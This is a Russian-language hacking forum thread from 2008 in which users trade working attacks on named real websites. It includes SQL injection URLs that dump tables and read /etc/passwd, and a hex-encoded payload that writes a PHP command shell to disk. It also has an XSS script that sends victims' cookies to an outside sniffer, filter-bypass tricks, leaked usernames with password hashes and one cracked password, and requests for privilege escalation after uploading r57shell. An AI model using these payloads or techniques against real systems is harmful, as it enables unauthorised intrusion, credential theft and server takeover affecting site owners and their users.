http://site.com/script.asp?id=1';exec master..xp_cmdshell 'ping -a твойip'--
Собственно сам вопрос : Как мне узнать внешний IP MSSQL сервера?
не думаю, что SQL сервер будет доступен из веб...
SELECT HOST_NAME()
Что-то блокирует пинги и тд. В процессах я не обнаружил нестандартных firewall'ов. А стандартный вырубил (предполагаю :) ) командой netsh firewall set opmode disable
Вот перечень процессов:
--------------------------------------------------------------
> tasklist
hex code : 0x7461736b6c697374
--------------------------------------------------------------
Directory listing
--------------------------------------------------------------
smss.exe 276 Console 0 448 K
csrss.exe 324 Console 0 3,884 K
winlogon.exe 348 Console 0 11,668 K
services.exe 396 Console 0 12,264 K
lsass.exe 408 Console 0 8,216 K
svchost.exe 584 Console 0 2,760 K
svchost.exe 648 Console 0 3,340 K
svchost.exe 728 Console 0 4,676 K
svchost.exe 764 Console 0 5,008 K
svchost.exe 780 Console 0 25,320 K
spoolsv.exe 932 Console 0 5,172 K
msdtc.exe 956 Console 0 4,884 K
svchost.exe 1164 Console 0 2,172 K
FPAVServer.exe 1184 Console 0 46,464 K
FreeFTPDService.exe 1216 Console 0 4,444 K
inetinfo.exe 1244 Console 0 13,132 K
sqlservr.exe 1324 Console 0 1,556,928 K
svchost.exe 1820 Console 0 1,316 K
winvnc4.exe 1108 Console 0 3,308 K
mssearch.exe 1428 Console 0 1,116 K
sqlagent.exe 1736 Console 0 4,852 K
svchost.exe 2072 Console 0 4,752 K
distrib.exe 2360 Console 0 6,736 K
logread.exe 2400 Console 0 6,324 K
distrib.exe 2444 Console 0 6,536 K
wmiprvse.exe 2624 Console 0 6,640 K
svchost.exe 2840 Console 0 3,936 K
logon.scr 3684 Console 0 1,660 K
cmd.exe 3648 Console 0 1,496 K
more.com 3704 Console 0 5,392 K
cmd.exe 3252 Console 0 1,492 K
--------------------------------------------------------------
Есть подозрение на FPAVServer.exe, но вроде как это антивирус.
truelamer
13.11.2008, 19:39
попробуй совет [Raz0r]
http://site.com/script.asp?id=1 or 1=(select HOST_NAME())--
a еще попробуй через cmd ipconfig
Пробовал. Ответ - ALFIE.
Возможно сервер действительно только локальный и доступа ко внешке у него нет. ipconfig я в первую очередь делал :) Но он мне выдал DNS-суффикс и локальный адрес.
Можно-ли ченить с этого поднять? Или без вариантов?
Через SELECT ..... UNHEX(HEX(pole).... FROM ... не получилось
я не понял, а как с этим делать 1+union+select+convert(pole)+using+latin1),+from+t able/* ?
Запрос такого вида +select+1,2,3,4,5,[видимое поле],7,8,9,10+from+users/*
название поля к примеру name
Помогите, пожалуйста))
Jokester
14.11.2008, 00:20
Через SELECT ..... UNHEX(HEX(pole).... FROM ... не получилось
я не понял, а как с этим делать 1+union+select+convert(pole)+using+latin1),+from+t able/* ?
Запрос такого вида +select+1,2,3,4,5,[видимое поле],7,8,9,10+from+users/*
название поля к примеру name
Помогите, пожалуйста))
1+union+select+1,2,3,4,5,UNHEX(HEX(name)),7,8,9,10 +from+users/*
pingvincible
14.11.2008, 08:35
Parse error: syntax error, unexpected T_ELSE in /home/u19620/xxx/www/edct/themes/10341d4b9666601999076f0da323fd5a/bfa-roundtabs/index.php on line 6
дает ли что-то такая ошибка привыполнении следующего запроса:
http://site.com/?cat=4-1
truelamer
14.11.2008, 10:24
2pingvincible
Это означает что else испаользуется в коде без if
ни чего ты запросами вида http://site.com/?cat=4-1 не сможешь сделать
Кроме раскрытия путей ничего не даёт..
Calcutta
15.11.2008, 14:45
Один очень интересный мне сайт имеет багу, инъекция слепая.
кавычки:
1) слешируются
2) подстановка кавычек обрабатывается и выдает пустую страницу.
http://site.ru/index.php?act=18/**/union/**/select/**/concat_ws(0x3a,table_name)/**/from/**/information_schema.tables/**/limit/**/0,1--
всего одна таблица. надо вытащить её название и после колонок в ней.
http://site.ru/index.php?act=25+AND+ascii(lower(substring(user(), 1,1)))=97--
юзера, систем_юзера подобрал. версия мускль 5.
http://site.ru/index.php?act=25+union+select+load_file(0x2F657463 2F706173737764)--
особо интересно получить содержимое файла /etc/paswd. или на крайний случай выжать максимально информации.
За помощь + обеспечен -)
S0ulVortex
15.11.2008, 14:56
я в хсс чайник пока полный. Вот есть пассивная хсс вот я щелкаю по ссылке у меня доходит до странички с хсс а можно сделать так чтобы он после поподания на эту страничку переходил на другую например показывал какую нибудь картинку.
-m0rgan-
15.11.2008, 15:32
Я тож в хсс не особо шарю....но там вродь нада составить скрипт который перекидует выполнять то что те нужно и вставить его в уязвимое поле...
P.S.:Если чтот не так написал просьба сильно не пинать...)
я в хсс чайник пока полный. Вот есть пассивная хсс вот я щелкаю по ссылке у меня доходит до странички с хсс а можно сделать так чтобы он после поподания на эту страничку переходил на другую например показывал какую нибудь картинку.
да.
js примерно следующего содержания
<script>
document.location.href="http://yandex.ru";
</script>
оно тебя перенаправит сам понимаешь куда))
В ифрейм вставь ссылку со своей КСС - и всё бут нормально. ЕСли хочешь, ниже редиррект ещё припиши
S0ulVortex
15.11.2008, 15:55
что не получается.У меня такого плана index js
в индексе пишу так
<script>document.location.href="ТУТ у меня хсс "</script>
а в js
img = new Image(); img.src = "http://na-s.ru/images/S0ulVortex_1.gif?"+document.cookie;
Я эту систему взял из видео где показывают хсс yandex
Может у кого есть другая система похожая на эту только чтобы после того как куки крадет кидала на какуюнють картинку или сайт
код чтобы перенаправить на сниффер + кук
http://site.ru/index.php?xss='><script>document.location.href='your_site/sniffer.php?cookie='+document.cookie;</script>
Добрый день
Как реализовать атаку SQL Injection в среде Interbase (Firebird)?
Warning: ibase_query(): Dynamic SQL Error SQL error code = -104 Token unknown - line 1, char 78 UNION in Firebird.phpПоддерживает ли Interbase установку UNION?
Был ли кого у опыт проведения атаки используя данную технологию?
Спасибо.
truelamer
15.11.2008, 19:57
http://www.nkzu.kz/new1/site_news.asp?id=123'
Microsoft JET Database Engine error '80040e14'
говорят не инжектится, но мне давным давно кто-то показал что таки извлеч инфу можно. Извлекали из табля news. Есть идеи как эту скулу раскрутить?
Parti, да в ibase можно объединять запросы оператором union; sql-inj хз смотря как построен запрос - попробуй perl-утилиту isr-sqlget
truelamer, _http://forum.antichat.ru/thread50550.html
Есть сайт, на нём бажный скрипт
script.php?id=-1+union+select+1,2,3,4,5,load_file(0x2F6574632F706 173737764),7,8,9,10/*
выдаёт содержимое etc\passwd ..
как мне шелл залить теперь?
Jokester
15.11.2008, 21:05
говорят не инжектится
Кто говорит? Просто это Access, и всё немного подругому, если хочешь подбирай таблицы и поля:
http://www.nkzu.kz/new1/site_news.asp?id=240+union+select+1,2,3,4,5,6+from +tblnews
попугай
Вчера расписывал ответ на такой-же вопрос:
https://forum.antichat.ru/showpost.php?p=942609&postcount=34
truelamer
15.11.2008, 21:09
2 jokester&l1ght
Спаcибо огромное)
а как узнал о существовании tblnews ???
попугай
script.php?id=-1+union+select+1,2,3,4,5,0x3c3f2073797374656d28245 f4745545b27636d64275d293b203f3e,7,8,9,10+from+tabl e_name+into+outfile+'/var/www/html/tmp/shell_name.php'/*
Где /var/www/html/tmp/ -путь к директории, доступной на запись (ковыряй, ищи), table_name имя любой таблицы,shell_name.php имя шелла (главное, чтоб в этой директории не было такого же =) ), а 0x3c3f2073797374656d28245f4745545b27636d64275d293b 203f3e -это захексенное '<?system($_GET[cmd]);?>', главное, чтобы кавычки прокатывали.
UPD
Не успел, ответили раньше =)
l1ght
А если вручную? Какая последовательность действий для инъекции в Interbase?
SQL Инъеция после WHERE
SELECT * WHERE ID=[SQL INJ]
почему когда я отправляю запрос
www.grog-ink.com/detail.asp?ID=1 or 1=@@version--
мне выводит:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'Product_ID = 1 or 1=@@version-- AND Product_Vis = 1'.
/detail.asp, line
А не нужные мне параметры? Запрос по сути верный..
Jokester
16.11.2008, 12:24
Ershik
Ты путаешь с MSSQL , а это Access, там немного другой синтаксис, и твой запрос не верен
Ershik
тебе сюда:
https://forum.antichat.ru/thread50550-Microsoft+Access.html
Есть сплоит Invision Power Board v2.1 <= 2.1.6 sql injection exploit by RST/GHC
Так вот, он ворует хеш, но на сколько мне известно в Invision Power Board 2.x.x алгоритм такой:
md5(md5($salt).md5($pass))
Значит нужна соль, сплоит её не ворует, где же её взять?
Еще вопрс, что означает эта уязвимость? Как ей можно воспользоваться?
http://www.campustore.it/ita/viewpage.aspx?ID=431'
Calcutta
16.11.2008, 22:12
час ночи и мозг отказывается работать. раскрутит кто? с результатами желательно в пм (-
http://www.zahar.de/bigmir/forum/showprofil.php?id=1'
Calcutta
http://www.zahar.de/bigmir/forum/showprofil.php?id=999+union+select+version()+limit +1,1
4 ветка... дальше с выводом проблемы )
Dima-k17
17.11.2008, 17:12
Да как бы проблем особо нету=) КРоме того что долго это все...
1) http://www.zahar.de/bigmir/forum/showprofil.php?id=999+union+select+ascii(substring (user(),1,1))+limit+1,1 - первый символ 85
2) http://www.zahar.de/bigmir/forum/showprofil.php?id=999+union+select+ascii(substring (user(),2,1))+limit+1,1 - второй символ 55
И т.д. погнали
Sindicat
18.11.2008, 00:36
у меня проблема если идет фильтрация select и char как можна ещё заменить ? да ещё пробывал ?id=-75 AND 1=1/* And тоже фильтруется
Jokester
18.11.2008, 00:46
у меня проблема если идет фильтрация select и char как можна ещё заменить ? да ещё пробывал ?id=-75 AND 1=1/* And тоже фильтруется
Видишь ли в чём дело, надо быть очень криворуким кодером, чтобы поставить фильтрацию на AND, char и select, и при этом оставить скуль в параметре id :)
100% ты что-то делаешь неправильно. линк кинь посмотрим
на самом деле бывает и такое
у меня проблема если идет фильтрация select и char как можна ещё заменить ? да ещё пробывал ?id=-75 AND 1=1/* And тоже фильтруется
Попробуй заменит and на &&, а select на seLEct или sel/*lala*/ect
Еще вопрс, что означает эта уязвимость? Как ей можно воспользоваться?
http://www.campustore.it/ita/viewpage.aspx?ID=431'
Это MsAccess.
http://forum.antichat.ru/thread50550-msaccess.html
Есть сплоит Invision Power Board v2.1 <= 2.1.6 sql injection exploit by RST/GHC
Так вот, он ворует хеш, но на сколько мне известно в Invision Power Board 2.x.x алгоритм такой:
Значит нужна соль, сплоит её не ворует, где же её взять?
Помоему так:
таблица: ibf_members_converge
колонки: converge_pass_hash,converge_pass_salt
Вопрос:
Имею доступ к MSSQL серверу с правами dbo, через баг в asp скрипте. Можно ли открыть порт 1433 для удаленного коннекта (к примеру через sp_configure)? Firewall отсутствует. Если можно, то каким образом.
Спасибо
Люди помогите плиз, я новичек в этом деле, поэтому всех фишек не знаю. У меня проблема - залил r57shell на серв - там сэйф моде отключен система freebsd 6.2. Можно ли как нибудь повысить привелегии, или вообще получить пароли к остальным сайтам на этом серве - это моя основная цель. Заранее спасибо
Calcutta
18.11.2008, 17:54
http://www.prodayka.ru/search.php?do_search=Search&searchword=%22%>+javasc<script<>ript:alert(a)
фильтрация стоит, но в принципе обходимая. вписать можно что угодно, просто показал пример обхода фильтрации.
можно как либо использовать подобное?
Sindicat
18.11.2008, 18:10
Я тот сайт потерял не могу вам показать, но есть другой вот например с этим можна что - то сделать ? http://myua.com.ua/index.php?l=2&o=96 ключевые слова тож фильтруются
Выбрал случайный сайт просто чем сложнее тем интиресний взломать
ребятки, не могу найти на ачате инфу про фильтрацию слов.
какие могут быть возможные методы обхода фильтрации целых слов?.
Вопрос:
Имею доступ к MSSQL серверу с правами dbo, через баг в asp скрипте. Можно ли открыть порт 1433 для удаленного коннекта (к примеру через sp_configure)? Firewall отсутствует. Если можно, то каким образом.
Спасибо
к сожалению, как настроить mssql сервер для разрешения удаленных подключений сказать не могу, но можно поступить обратным образом, т.е. заставить mssql подключиться к твоему серверу с помощью OPENROWSET и OPENDATASOURCE. По данной теме есть хорошая статья на секлабе:
http://www.securitylab.ru/analytics/216396.php
ребятки, не могу найти на ачате инфу про фильтрацию слов.
какие могут быть возможные методы обхода фильтрации целых слов?. <scri<script>pt> , как вариант, если ты это имеешь в виду.
ох фак, не написал. я имел в виду скуль. есть скуль, но без объединения запросов мне придется втыкать вслепую :( конкретно на сайте в запросе недопускается "union". post'ом не хавает :(
ох фак, не написал. я имел в виду скуль. есть скуль, но без объединения запросов мне придется втыкать вслепую :( конкретно на сайте в запросе недопускается "union". post'ом не хавает :(
Как вариант: -1' OR id=IF(ASCII((SELECT USER()))>=254,'1','0') -- И перебирать по символам, скелет сплоита, работающего по этому принципу, можешь взять к примеру у меня: https://forum.antichat.ru/thread79705.html
Народ ну пожалуйста подскажите как повысить привелегии на freebsd 6.2 или как вытащить пароли, а то я впервые залил шел и не могу ниче сделать толкового (сэйф моде отключен)
я в курсе. меня интересует именно фактическое применение union, но в обход фильтрации.
я в курсе. меня интересует именно фактическое применение union, но в обход фильтрации. А фильтрация, это типа вырезание слова union или посыл нах при попытке отправить запрос с union ?
Calcutta
18.11.2008, 19:32
я в курсе. меня интересует именно фактическое применение union, но в обход фильтрации.
может фильтроваться только "union" в нижнем регистре, встречал такое одажды. -> "UniOn"
после того, как админ пофиксил, я использовал " -> "un/**/ion".
гдето видел статью на тему обхода фильтрации, на досуге поищу в своих архивах (-
.acme, мне кажется что там просто мускул третьей ветки...
Дай линк поковыряем
Sindicat
18.11.2008, 19:39
Вот помогите есть уязвимость но не выводится ничего http://www.ewb-usa.org/news.php?ID=-1'
o3,14um там пятая ветка, разные UnIoN, uni"+"on,un/**/ion - не проходят.
http://ma s t e r o ff.org/edit.php?q='' (13cols)
Ну блин - залить это одно а серв прокавырять это ж совсем другое. Из по админа сайта залил, вот а что дальше делать чтоб к остальным сайтам на этом серваке пробиться?
Вот помогите есть уязвимость но не выводится ничего http://www.ewb-usa.org/news.php?ID=-1'
вот держи
http://www.ewb-usa.org/news.php?ID=-1'+union+select+version(),2,3/*
дальше сам кавыряй...))
Вот помогите есть уязвимость но не выводится ничего http://www.ewb-usa.org/news.php?ID=-1'
вот решил добить...
http://www.ewb-usa.org/news.php?ID=-1'+union+select+concat(username,char(58),password) ,2,3+from+auth_users/*
Sindicat
18.11.2008, 20:09
вот держи
http://www.ewb-usa.org/news.php?ID=-1'+union+select+version(),2,3/*
дальше сам кавыряй...))
Спасибоо !! одна ' все решает )))
http://www.ewb-usa.org/news.php?ID=-1'+union+select+concat_ws(0x3a,UserName,password), 2,3+from+auth_users+limit+3,1/*
Ann:1756543d9b768d870fab2000d9b667f8
Meg:f807febec044b8dfa8996c79da35e599
Люди помогите плиз. У меня проблема - залил r57shell на серв - там сэйф моде отключен система freebsd 6.2. Можно ли как нибудь повысить привелегии, или вообще получить пароли к остальным сайтам на этом серве - это моя основная цель (из файлов с паролями читается только pwd.db, а passwd файла вообще нет, поэтому назревает вопрос а можно ли прочитать как нибудь master.passwd). Заранее спасибо
http://www.site//out.asp?id=1+or+1=(SELECT+TOP+1+cast(username+as+n varchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+ from+x_ads_account)--
Tipo di errore:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Sintassi non corretta in prossimità della parola chiave 'or'.
/appl/out.asp, linea 133
почему пишет, что неверное слово or, когда ДО этого, я спокойно его использовал при выводе таблиц? можно ли его заменить как-то?
Ann:1756543d9b768d870fab2000d9b667f8:new!pass#
Люди помогите плиз. У меня проблема - залил r57shell на серв - там сэйф моде отключен система freebsd 6.2. Можно ли как нибудь повысить привелегии, или вообще получить пароли к остальным сайтам на этом серве - это моя основная цель (из файлов с паролями читается только pwd.db, а passwd файла вообще нет, поэтому назревает вопрос а можно ли прочитать как нибудь master.passwd). Заранее спасибо
стандарт: узнай че висит на сервере, потом идешь, например, на милворм и ищешь "инструмент"(эксплойт) и можешь действовать :)
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot